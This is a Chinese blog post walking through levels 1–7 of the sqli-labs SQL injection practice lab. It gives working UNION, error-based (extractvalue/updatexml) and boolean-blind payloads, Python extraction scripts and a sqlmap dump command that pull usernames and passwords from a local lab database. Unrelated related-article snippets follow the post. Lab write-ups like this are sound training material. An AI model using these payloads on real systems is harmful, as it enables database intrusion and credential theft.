SQLIte1-7关

最新推荐文章于 2024-07-24 17:08:13 发布
最新推荐文章于 2024-07-24 17:08:13 发布
阅读量44 收藏
点赞数
文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51584770/article/details/131123097
版权

Less-1

使用单引号闭合

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

如果输入$id = 1' #会把语句拼接为,'#'后面的语句被注释掉

$sql="SELECT * FROM users WHERE id='1'#' LIMIT 0,1";

只显示一行数据,使用sqlmap注入即可

 

Less-2

整数注入

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

输入$id = 1#,语句拼接为,‘#’后面的语句被注释掉,使用sqlmap进行注入

$sql="SELECT * FROM users WHERE id=1# LIMIT 0,1";

 手动注入

http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata#
http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'#
http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name= 'users'#
http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(username,'~',password) from users #

Less-3

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

如果输入$id = 1')  -- +拼接起来的语句就是,那么'-- +'后面的语句就会被注释掉

$sql="SELECT * FROM users WHERE id=('1')-- +') LIMIT 0,1";

手动注入

http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select  1,2,group_concat(schema_name) from information_schema.schemata -- +
http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema= 'security'-- +
http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users' -- +
http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,'~',password) from users -- +

Less-4

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

输入人$id = 1 ") -- +,语句拼接为

$sql="SELECT * FROM users WHERE id=("$id") -- +) LIMIT 0,1";

使用sqlmap进行注入

将文件保存下来,进行注入

手工注入

http://192.168.8.1/sqli/sqli/Less-4/?id= 1 ") order by 4 -- +
http://192.168.8.1/sqli/sqli/Less-4/?id= -1 ") union select 1,2,group_concat(schema_name) from information_schema.schemata -- +
http://192.168.8.1/sqli/sqli/Less-4/?id= -1 ") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' -- +
http://192.168.8.1/sqli/sqli/Less-4/?id= -1 ") union select 1,2,group_concat(username,'~',password) from users -- +

Less-5

盲注

可以发现如果select查找的数据为空则输出“错误”,否则输出“正确”。通过这一点使用bp进行爆破

如果and后面连接的布尔值为0,则输出错误的,如果连接的布尔值为1,这输出正确的。

我们不妨构造语句,if(length(database())=3,1,0)

通过这个语句可以判断数据库名字的长度

 

http://192.168.8.1/sqli/sqli/Less-5/?id=1' and if(substr(database(),1,1)='s',1,0) -- +

 

 查看表的长度

http://192.168.8.1/sqli/sqli/Less-5/?id=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema = 'security'))=10,1,0) -- +

爆表

import requests


flag = "";

for i in range(1,30):
    for j in range(1,128):
        url='http://192.168.8.1/sqli/sqli/Less-5/?id=1%27%20and%20if(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27),{},1))={},1,0)%20--%20+'.format(i,j);
        tmp_text = requests.get(url).content.decode("utf=-8", "ignore");
        #print(tmp_text)
        if '正确的' in  tmp_text:
            flag += chr(j);
            print(flag)

爆列的长度

 爆列名

import requests


flag = "";

for i in range(1,193):
    for j in range(1,128):
        url='http://192.168.8.1/sqli/sqli/Less-5/?id=1%27%20and%20if(ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%20%27users%27),{},1))={},1,0)%20--%20+'.format(i,j);
        tmp_text = requests.get(url).content.decode("utf=-8", "ignore");
        #print(tmp_text)
        if '正确的' in  tmp_text:
            flag += chr(j);
            print(flag)

爆表名

import requests


flag = "";

for i in range(1,193):
    for j in range(1,128):
        url="http://192.168.8.1/sqli/sqli/Less-5/?id=1' and if(ascii(substr((select group_concat(password,'~',username) from users),{},1))={},1,0) -- +".format(i,j);
        tmp_text = requests.get(url).content.decode("utf=-8", "ignore");
        #print(tmp_text)
        if '正确的' in  tmp_text:
            flag += chr(j);
            print(flag)

用sqlmap

python sqlmap.py -u http://192.168.8.1/sqli/sqli/Less-5/?id=1 --dump -D security -T users -C password,username

Less5还可以使用报错注入 ,可以发现如果我们输入错误的话,会将错误信息给输出 

 

 这里我们使用xpath语法错误导致的报错注入,这里主要使用的是extractvalue和updatexml两个函数

语法:extractvalue(xml_document,Xpath_string)

SQL> set linesize 300;
SQL> select * from dbmgr.xmldemo;
         A B
---------- -------------------------------------------------------------------------------------------------------------
         6 <A>3</A>

SQL> select EXTRACTVALUE(xmltype(B),'/A') from dbmgr.xmldemo;EXTRACTVALUE(XMLTYPE(B),'/A')
------------------------------------------------------------------------------------------------------------------------
3

第二个参数是要求符合xpath语法的字符串,如果不满足要求,则会发生报错,并将我们查询的结果返回在报错信息中。

 

 

http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema = 'security'))) -- +
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name= 'users'))) -- +

可以看到这里是存在问题的,extractvalue只能显示32个字符,使用substr进行截取即可

http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',substr((select group_concat(column_name) from information_schema.columns where table_name= 'users'),32,32))) -- +

 

http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',substr((select group_concat(username,'~',password) from users),96,32))) -- +

 updatexml和extractvalue其实差不多,但是updatexml具有更新的含义,他的参数是updatexml(xml_document,Xpath_string,new_string),new_string是替换的新值

http://192.168.8.1/sqli/sqli/Less-5/?id=1' and updatexml(1,concat('~',(select group_concat(username,'~',password) from users)),1) -- +

 

 Less-6

同Less-5差不多,但是他这里有双引号闭合

使用extractvalue进行报错注入

1" and extractvalue(1,concat('~',database()))-- + 
1" and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')))-- + 
1" and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')))-- + 
?id=1" and extractvalue(1,concat('~',substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,32)))-- + 
?id=1" and extractvalue(1,concat('~',substr((select group_concat(username,'~',password) from users),1,32)))-- +

 

 Less-7

 没办法使用报错注入了

但是可以使用布尔盲注

import requests


flag = "";

for i in range(1,193):
    for j in range(1,128):
        url="http://192.168.8.1/sqli/sqli/Less-7/?id=1')) and if(ascii(substr((select group_concat(username,'~',password) from users),{},1))={},1,0) --+".format(i,j);
        tmp_text = requests.get(url).content.decode("utf=-8", "ignore");
        #print(tmp_text)
        if 'Use' in  tmp_text:
            flag += chr(j);
            print(flag)

luckyilsy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
嵌入式数据库SQlite3-进阶篇
szq0909的博客
03-12 1489
下面列出了一些有用的 SQLite 内置函数,且所有函数都是大小写不敏感,这意味着您可以使用这些函数的小写形式或大写形式或混合形式。HAVING子句中能够使用三种要素:常数,聚合函数,GROUP BY子句中指定的列名(聚合建), 用having就一定要和group by连用, 用group by不一有having(它只是一个筛选条件用的)大家会看到,前一条语句列出来的是所有的记录,而后一条记录列出来的是name字段中含有“明”的记录,所以说,当我们作字符型字段包含一个子串的查询时最好采用“%”而不用“
sqlite3:锁机制、stmt加速、wal日志模式、多进程并发、写互斥
wangjunhe的专栏
06-09 1454
最近需要做sqlite的并发优化,会有一些多主机多进程的操作失败问题,所以学习一下,顺便为了翻阅,做一个笔记收集。 未完成。。。。。。。。。。。。。。。。。。。 to be continued 目前只对我某时刻最注的点做笔记,默认简单的就跳过了。 工作和时间原因,顺序有些乱,可能随时遇到问题就插进去了。 锁机制与事务类型 https://www.cnblogs.com/lijingcheng/p/4454884.html sqlite3源代码注释说明 等等等。。。 键点 读..
Sqlite3知识总结二(高级用法)
孙朝阳的博客
06-12 1084
现有两张表用于下面的演示:company、department. 多表查询 SQLite 的 Join 子句用于结合两个或多个数据库中表的记录。JOIN 是一种通过共同值来结合两个表中字段的手段。 SQL 定义了三种主要类型的连接:交叉连接 - CROSS JOIN、内连接 - INNER JOIN、外连接 - OUTER JOIN。 1、交叉连接(CROSS JOIN)把第一个表的每一行与第二个表的每一行进行匹配。如果两个输入表分别有 x 和 y 行,则结果表有 x*y 行。 select emp_id
SQLite的原子提交--单文件场景
azurelaker的博客
09-12 585
1. 简介 原子提交(atomic commit)是类似SQLite这样的事务性数据库的一个重要特性.原子提交意味着, 在单一的事务中,所有的数据改变或者全部生效或者全部不生效.具有原子提交后, 对于数据库文件的不同部分的多个写入操作,就好像是同时并且瞬态发生的.但是在硬件层面, 对大容量存储设备的写入操作, 以及对一个扇区的写操作都是需要一定时间的,因此对一个数据库文件的多个扇区的写入操作是不...
SQLite 知识摘要 --- 事务
weixin_30376163的博客
08-19 150
在许多时候,我们在使用大数据的时候会发现,尽管sqlite数据库的执行效率已经很快了,但是还是满足不了我们的需求,这时候我们会很容易考虑到使用并发的方式去访问sqlite数据库,但是sqlite数据独有的机制有会让我们在使用中遇到各种问题,如死锁,报错等等。下午就详细介绍一下sqlite的事务,了解sqlite事务对我们并发操作sqlite数据库具有极大的帮助。 本篇预备知识 我们先来...
Sqlite3-static.7z
07-02
在使用SQLite3时,理解其基本概念和操作流程至重要,如准备SQL语句、执行查询、处理结果集、事务管理和错误处理等。此外,了解SQLite3的存储结构、索引优化、并发控制机制也有助于提高应用的性能和数据安全性。 ...
sqlite-amalgamation-3370000.zip
11-30
7. **安全性和加密**:SQLite提供了可选的加密模块,允许对数据库文件进行加密,保护敏感数据。新版本可能增强了加密算法或安全性。 8. **事务处理**:SQLite支持ACID(原子性、一致性、隔离性、持久性)事务,确保...
sqlitestudio-3.3.1.zip
03-24
7. **权限管理**:虽然SQLite数据库本身没有复杂的权限系统,但SQLite Studio提供了基本的用户和角色管理,可以控制不同用户对数据库的访问权限。 8. **版本控制**:对于开发团队来说,SQLite Studio还支持版本控制...
sqlite-tools-linux-x86-3350400.zip
05-17
1. **sqlite3**: 这是SQLite的主要命令行接口。用户可以通过这个工具执行SQL语句,创建和管理数据库,查询数据,甚至进行复杂的数据库操作。例如,你可以创建新的数据库、插入记录、更新或删除数据,以及执行复杂的...
SQLite中的B-Tree实现细节分析
09-11
1. **页结构**:SQLite将数据库文件划分为页(Page)作为基本的存储单元。页的大小可以从512字节到65536字节,这在文件头中定义。每个页可以是B-Tree页、自由列表页(用于管理空闲空间)或溢出页(用于存储超大数据...
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 783
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相的复制任务。
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 377
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 243
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
SQLynx数据库管理工具
最新发布
core815的专栏
07-24 330
SQLynx数据库管理工具
在 Windows 上安装 PostgreSQL
the_beginner的博客
07-24 421
选择额外的安装项(这里我选了一个JDBC驱动包,方便DBeaver访问)安装界面会指定服务程序和库两个路径,可以自己手动选择。官网直接提供exe安装包,没有手动安装的压缩包。
SQL进阶技巧:如何使用差值累计计算思想巧解数学中递归计算问题
石榴姐yyds
07-23 550
本文给出了一种利用SQL语言如何解决数学上递归问题。解决问题的核心在于对差值累计计算的认识,差值累计计算的本质也就是数学中的迭代计算思想在SQL语言中的体现。本文中所描述的问题需要将上一行的计算结果拿出来放到下一行继续叠加,按照直观的思路需要用lag函数去取上一行值但是lag函数获取的往往都是明确的结果值,而这种需要动态计算,于是会走到递归计算的误区中,而需求中所描述的计算方式就是递归的思路,容易产生误解,但仔细推导我们不难发现其实就是每行按照固定的公式算出差值的累加,即 字段X的累计值减去字段Y的累计值等
Dav_笔记10:Using SQL Plan Management之4
Dav_2099的博客
07-23 471
数据库清除超过53周未使用的计划,由该计划的SMB中存储的LAST_EXECUTED时间戳标识。您可以使用计划名称(plan_name)
sqlalchemy使用json_unquote函数的mysql like查询
ithongchou的博客
07-23 1302
为您自己的数据库连接信息,并根据实际表结构修改模型类。函数查询MySQL JSON字段可以通过使用。下面是一个示例,假设有一个名为。请确保替换示例代码中的数据库连接字符串(在SQLAlchemy中使用。的表,其中包含一个名为。
使用sqlalchemy查询mysql的JSON字段
ithongchou的博客
07-23 173
首先,你需要定义一个与表格对应的模型类。
SQLite数据库指南:Using SQLite
7. 程序开发集成:解释如何将SQLite集成到各种编程语言(如Python、Java、C++、PHP等)中,提供示例代码和最佳实践,帮助开发者在项目中有效利用SQLite。 8. 性能优化:分析SQLite的性能特性,提供优化查询性能和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值